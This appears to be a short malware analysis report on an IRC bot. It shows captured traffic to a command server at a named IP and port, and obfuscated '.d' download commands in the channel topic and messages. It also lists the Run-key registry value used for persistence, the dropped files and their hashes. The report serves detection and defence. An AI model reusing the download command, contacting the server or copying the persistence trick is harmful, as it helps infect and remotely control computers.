Remote Host Port Number
174.127.127.137 81
NICK n[USA|XP|COMPUTERNAME]xvfnrcj
USER n “” “lol” :n
JOIN #bul#
PONG 422
PONG :request4.not.found
Now talking in #bul#
Topic On: [ #bul# ] [ 13 .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/ ]
Topic By: [ n ]
(abc) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
(RDP) .d /99/106/112/81/55/59/40/120/121/125/100/110/115/116/118/113/115/38/127/122/100/56/109/79/79/125/108/53/62/36/44/58/53/52/51/18/53/44/101/67/118/97/45/99/116/112/
Registry Modifications
* The newly created Registry Value is:
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun]
+ WindowsDriverControl = “%AppData%C-76947-8457-2745wincdrkfk.exe”
so that wincdrkfk.exe runs every time Windows starts
File System Modifications
* The following files were created in the system:
# Filename(s) File Size File Hash
1 %AppData%C-76947-8457-2745wincdrkfk.exe
[file and pathname of the sample #1] 155,648 bytes MD5: 0x4E3DA73627348C20996F63BBC24275F9
SHA-1: 0x57FCFAB2D3EAF49EB91EA17CE6E66B44E69297B4
2 %System%winrtsnr.txt 0 bytes MD5: 0xD41D8CD98F00B204E9800998ECF8427E
SHA-1: 0xDA39A3EE5E6B4B0D3255BFEF95601890AFD80709
infos about hosting:
http://www.dnsstuff.com/tools/whois/?tool_id=66&token=&toolhandler_redirect=0&ip=174.127.127.137